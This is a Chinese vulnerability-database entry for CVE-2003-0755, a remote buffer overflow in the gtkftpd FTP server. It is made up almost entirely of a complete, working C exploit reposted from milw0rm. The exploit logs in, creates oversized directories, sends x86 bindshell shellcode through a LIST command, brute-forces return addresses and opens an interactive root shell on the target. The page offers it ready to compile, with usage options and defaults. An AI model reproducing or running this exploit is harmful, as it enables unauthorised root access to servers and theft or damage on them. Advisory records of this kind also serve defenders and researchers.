gtkftpd缓冲区溢出漏洞
漏洞ID | 1107462 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2003-08-28 | 更新时间 | 2003-10-20 |
CVE编号 | CVE-2003-0755 |
CNNVD-ID | CNNVD-200310-043 |
漏洞平台 | Linux | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
gtkftpd1.0.4及其早期版本的sys_cmd.c存在缓冲区溢出漏洞。远程攻击者通过创建超长目录名称和列带LIST命令的表单执行任意代码。
|漏洞EXP
/**********************************************************
* [ gtkftpd[v1.0.4(and below)]: remote root buffer overflow exploit. ]
*
* by: vade79/v9 v9 at fakehalo.deadpig.org (fakehalo/realhalo)
*
* Url:
* http://gtkftpd.sourceforge.net/
*
* GtkFtpd, versions v1.0.4 and below(as of this time), contain a
* remotely exploitable buffer overflow. the overflow occurs when
* GtkFtpd allocates the appropriate amount of memory to hold a
* filename or directory(256 bytes), but does not account for the
* date/user/stat prefix(~40 bytes) it prepends to the buffer.
*
* When exploited, things are made easier due to the fact that
* GtkFtpd does not chroot() or drop its root privileges(as are
* required to run the program itself) while running. And one step
* more easier because when the buffer is overflown it is in a child
* process, making it possible to brute force(not crash).
*
* Requirements to exploit:
* - A valid account. (user/pass, anonymous will do)
* - A writable directory. (usually gtkftpd makes any dir writable)
*
* Usage:
* # cc xgtkftpd.c -o xgtkftpd
* # ./xgtkftpd [-Psupcbanrd] -h hostname
* *
* Exploit workings(ftp commands):
* MKDIR <large name/causes overflow>
* LIST -<shellcode> (where the overflow occurs)
*
* The exploitable code itself is found in src/sys_cmd.c:
* 12:#define BUF_SIZE 256
* 21:char buf[BUF_SIZE];
* 57:sprintf(buf, "%st%s", perm_date_siz, entr->d_name);
*
* Note:
* Make sure the directory used to "LIST" does not already contain
* any large filenames or directories, as the first overly long one
* to list will cause the overflow. (which will fail the exploit)
* *
* (should work out of the box on generic linux, tested on rh7.1.
* squished, un-tab'd, un-space'd, exploit code; just how i like it.)
**********************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <getopt.h>
#include <ctype.h>
#include <time.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* default definitions, change at will. */
#define DFLUSER "anonymous" /* no argument, default username. */
#define DFLPASS "[email protected]" /* no argument, default password. */
#define DFLDIR "/incoming" /* no argument, default +w directory. */
#define DFLCLM 80 /* default screen width to use. */
#define DFLADDR 0xbffffffa /* base brute address. */
#define TIMEOUT 10 /* connection timeout. */
static char x86_exec[]= /* bindshell(sport), modded from netric. */
/* port defined in byte 20, and 21; in a 'short' cast form. */
"x31xc0x50x40x89xc3x50x40x50x89xe1xb0x66xcdx80x31"
"xd2x52x66x68x00x00x43x66x53x89xe1x6ax10x51x50x89"
"xe1xb0x66xcdx80x40x89x44x24x04x43x43xb0x66xcdx80"
"x83xc4x0cx52x52x43xb0x66xcdx80x93x89xd1xb0x3fxcd"
"x80x41x80xf9x03x75xf6x52x68x6ex2fx73x68x68x2fx2f"
"x62x69x89xe3x52x53x89xe1xb0x0bxcdx80";
/* protos/functions. */
char *getdir(unsigned int);
char *getbdir(void);
char *getcode(void);
void filter_text(char *);
void ftp_printf(int,char *,...);
void ftp_clean(int);
void ftp_read(int);
void ftp_parse(int);
void ftp_connect(void);
void getshell(int,unsigned int);
void printe(char *,short);
void usage(char *);
void sig_ctrlc(){printe("user aborted.",1);}
void sig_alarm(){printe("alarm/timeout hit.",1);}
void sig_pipe(){printe("connection closed/failed.",1);}
/* globals. (ease of use throughout) */
unsigned short align=2; /* probably will never need to be otherwise. */
unsigned short port=21; /* generic ftp daemon port. */
unsigned short sport=7979; /* generic bindshell port. */
unsigned short reverse=0; /* go upward, instead of downward */
unsigned short no_io=0; /* do not show traffic. */
unsigned int attempts=100; /* number of times to brute. */
unsigned int columns=80; /* generic screen width. */
unsigned int ftp_i=0; /* Nth time read ftp socket. */
unsigned int baseaddr=DFLADDR; /* base address. (again) */
char *host; /* hostname/target, a must have. */
char *user; /* username to use. */
char *pass; /* password to use. */
char *writedir; /* need a writable directory. */
char *basedir; /* gets filled in later. */
/* program start. */
int main(int argc,char **argv){
int chr=0;
printf("[*] gtkftpd[v1.0.4(and below)]: remote root buffer overflow"
" exploit.n[*] by: vade79/v9 [email protected] (fakehalo)nn");
/* set the chomp point, filter long lines. */
if(getenv("COLUMNS"))columns=atoi(getenv("COLUMNS"));
if(7>columns||columns>256)columns=DFLCLM;
while((chr=getopt(argc,argv,"h:P:s:u:p:c:b:a:n:rd"))!=EOF){
switch(chr){
case 'h':
if(!host&&!(host=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'P':
port=atoi(optarg);
break;
case 's':
sport=atoi(optarg);
break;
case 'u':
if(!user&&!(user=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'p':
if(!pass&&!(pass=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'c':
if(!writedir&&!(writedir=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'b':
sscanf(optarg,"%x",&baseaddr);
break;
case 'a':
align=atoi(optarg);
break;
case 'n':
attempts=atoi(optarg);
break;
case 'r':
reverse=1;
break;
case 'd':
no_io=1;
break;
default:
usage(argv[0]);
break;
}
}
if(!host)
usage(argv[0]);
/* fill in the blanks, or out of bounds. */
if(!user)user=DFLUSER;
if(!pass)pass=DFLPASS;
if(!writedir)writedir=DFLDIR;
if(!baseaddr)baseaddr=DFLADDR;
if(align>3)align=2;
if(!((sport&0xff00)>>8)||!(sport&0x00ff)){
printf("[!] shell port defined contains null byte(s), using default.n");
sport=7979; /* back to default. */
}
/* change the bindshell port. */
x86_exec[20]=(sport&0xff00)>>8;
x86_exec[21]=(sport&0x00ff);
/* verbose. */
printf("[*] target: %s:%d, identity: %s:%s.n[*] directory: %s, brute"
" start: 0x%.8x, alignment: %d.n[*] memory direction: %s, attempts: "
"%d, bindshell port: %d.nn",host,port,user,pass,writedir,baseaddr,
align,(!reverse?"downward":"upward"),attempts,sport);
signal(SIGINT,sig_ctrlc); /* explained/pretty exit. */
signal(SIGPIPE,sig_pipe); /* handle abnormal disconnects. */
ftp_connect(); /* do the magic, brute force. */
printe("brute force exhausted, failed.",0);
exit(0);
}
char *getdir(unsigned int offset){
unsigned int i=0;
char *buf;
/* 256 will fail; 255 or less. */
if(!(buf=(char *)malloc(255+1)))
printe("getdir(): allocating memory failed.",1);
memset(buf,0x0,255+1);
if(align)memset(buf,'x',align);
for(i=align;i<252;i+=4){
if(!reverse)*(long *)&buf[i]=(baseaddr-offset);
else *(long *)&buf[i]=(baseaddr+offset);
}
return(buf);
}
char *getbdir(void){
char *buf;
time_t ttt;
struct tm *ttm;
if(!(buf=(char *)malloc(32+1)))
printe("getbdir(): allocating memory failed",1);
ttt=time(NULL);
ttm=localtime(&ttt);
strftime(buf,32,"tmp_%H:%M:%S_%d-%m-%Y",ttm);
return(buf);
}
char *getcode(void){
char *buf;
if(!(buf=(char *)malloc(512+1)))
printe("getcode(): allocating memory failed",1);
memset(buf,0x90,(512-strlen(x86_exec)));
memcpy(buf+(512-strlen(x86_exec)),x86_exec,strlen(x86_exec));
return(buf);
}
void filter_text(char *ptr){
unsigned int i=0;
for(i=0;i<strlen(ptr);i++){
/* keep it short and sweet. */
if(i>=(columns-3)){
ptr[i--]=0x0;
ptr[i--]='.';
ptr[i--]='.';
ptr[i]='.';
}
/* don't make r or n a '?'. */
else if(ptr[i]=='r'||ptr[i]=='n')ptr[i]=0x0;
/* don't ugly the local terminal. */
else if(!isprint(ptr[i]))ptr[i]='?';
}
return;
}
void ftp_printf(int sock,char *fmt,...){
char *buf;
va_list ap;
if(!(buf=(char *)malloc(1024+1)))
printe("ftp_printf(): allocating memory failed.",1);
memset(buf,0x0,1024+1);
va_start(ap,fmt);
vsnprintf(buf,1024,fmt,ap);
va_end(ap);
write(sock,buf,strlen(buf)); /* write it, then mod it for display. */
filter_text(buf);
if(!no_io)
printf("-> %sn",buf);
free(buf);
return;
}
void ftp_clean(int sock){
ftp_printf(sock,"CWD ..rn");
ftp_read(sock);
ftp_printf(sock,"RMD %srn",basedir);
ftp_read(sock);
ftp_printf(sock,"QUITrn");
ftp_read(sock);
return;
}
void ftp_read(int sock){
char *buf;
if(!(buf=(char *)malloc(1024+1)))
printe("ftp_read(): allocating memory failed.",1);
memset(buf,0x0,1024);
read(sock,buf,1024);
filter_text(buf);
if(!no_io)
printf("<- %sn",buf);
/* some initial reply checking, not too much. */
if(!ftp_i)
if(!strstr(buf,"GtkFTPd"))
printe("this exploit is only for GtkFTPd, failed.",1);
if(ftp_i==2)
if(strncmp(buf,"230",3))
printe("invalid username/password, failed.",1);
if(ftp_i==3)
if(strncmp(buf,"250",3))
printe("invalid writable directory, failed. (try "/")",1);
free(buf);
ftp_i++; /* increase the response identifier. */
return;
}
void ftp_parse(int sock){
unsigned int offset=0;
ftp_read(sock); /* get the banner. */
ftp_printf(sock,"USER %srn",user);
ftp_read(sock);
ftp_printf(sock,"PASS %srn",pass);
ftp_read(sock);
ftp_printf(sock,"CWD %srn",writedir);
ftp_read(sock);
basedir=getbdir(); /* tmp dir of our own to use. */
ftp_printf(sock,"MKD %srn",basedir);
ftp_read(sock);
ftp_printf(sock,"CWD %srn",basedir);
ftp_read(sock);
while(offset<(attempts*400)){ /* if it hasn't yet, it's not going to. */
/* slight null-byte/CR check, only needs to check the last byte. */
if((!reverse&&!((baseaddr-offset)&0xff))||(reverse&&!((baseaddr+offset)
&0xff))||(!reverse&&((baseaddr-offset)&0xff)=='n')||(reverse&&
((baseaddr+offset)&0xff)=='n')){
printf("[!] brute address contains null-byte/CR, increasing offset "
"by one byte.n");
offset++; /* one byte off if reversed won't hurt here. (401) */
}
/* make the evil oversized directory. (255 or less bytes) */
ftp_printf(sock,"MKD %srn",getdir(offset));
ftp_read(sock);
/* date+directory exceeds 256 byte buffer, the exploit. */
sleep(1); /* delay insurance. */
ftp_printf(sock,"LIST -%srn",getcode());
/* nothing to read here, and gtkftpd processes (the exploit) */
/* before the ftp list connection is made, making it */
/* pointless to view the list. */
sleep(1); /* delay insurance, again, just to be sure. */
/* delete directory, multiples will cause failure(s). */
ftp_printf(sock,"RMD %srn",getdir(offset));
ftp_read(sock);
getshell(sock,offset);
offset+=400; /* always at least 400 nops in a row, in shellcode. */
}
ftp_clean(sock);
close(sock);
return;
}
void ftp_connect(void){
int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
if((s.sin_addr.s_addr=inet_addr(host))){
if(!(t=gethostbyname(host)))
printe("couldn't resolve hostname.",1);
memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
}
printf("[*] attempting to connect: %s:%d.n",host,port);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("gtkftpd connection failed.",1);
alarm(0);
printf("[*] connected successfully: %s:%d.n",host,port);
ftp_parse(sock);
return;
}
void getshell(int ftpsock,unsigned int offset){
int sock,r;
fd_set fds;
char buf[4096+1];
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(host))){
if(!(he=gethostbyname(host)))
printe("getshell(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,sizeof(sa.sin_addr));
}
sa.sin_port=htons(sport);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
printf("[*] checking for bindshell: %s:%d. (0x%.8x)n",host,sport,
(!reverse?(baseaddr-offset):(baseaddr+offset)));
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.n",host,sport);
close(sock); /* don't want fd's to fill up. */
alarm(0);
return;
}
alarm(0);
printf("[*] successfully connected: %s:%d.n",host,sport);
printf("[*] attempting to cleanup leftover directory(s).n");
ftp_clean(ftpsock);
close(ftpsock);
printf("[*] entering remote shell. (%s:%d)nn",host,sport);
signal(SIGINT,SIG_IGN);
write(sock,"cd /;uname -a;idn",18);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
void printe(char *err,short e){
printf("[!] error: %sn",err);
if(e)exit(1);
return;
}
void usage(char *name){
printf(" usage: %s [options] -h hostnamenn options:n"
" -h <string>tdefines the target host/ip.t(REQUIRED)n"
" -P <number>tdefines the target port.t(%d)n"
" -s <number>tdefines the bindshell port.t(%d)n"
" -u <string>tdefines the username.tt("%s")n"
" -p <string>tdefines the password.tt("%s")n"
" -c <string>tdefines the writable directory.t("%s")n"
" -b <string>tdefines the base brute address.t(0x%.8x)n"
" -a <number>tdefines the alignment.tt(%d)n"
" -n <number>tdefines the number of attempts.t(%d)n"
" -rttgo upward in memory, instead of downward.n"
" -dttdo not show verbose ftp in/out traffic.nn",
name,port,sport,DFLUSER,DFLPASS,DFLDIR,DFLADDR,align,attempts);
exit(0);
}
// milw0rm.com [2003-08-28]
|受影响的产品
GtkFtpd gtkftp 1.0.4
GtkFtpd gtkftp 1.0.3
GtkFtpd gtkftp 1.0.2
|参考资料
来源:VULN-DEV
名称:20030826gtkftpd[v1.0.4(andbelow)]:remoterootbufferoverflowexploit.
链接:http://archives.neohapsis.com/archives/vuln-dev/2003-q3/0101.html
Webster HTTP服务器文件泄露漏洞 漏洞ID 1203170 漏洞类型 路径遍历 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2269 CNNVD-ID CNNVD-200212-861 漏洞平台 N/…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666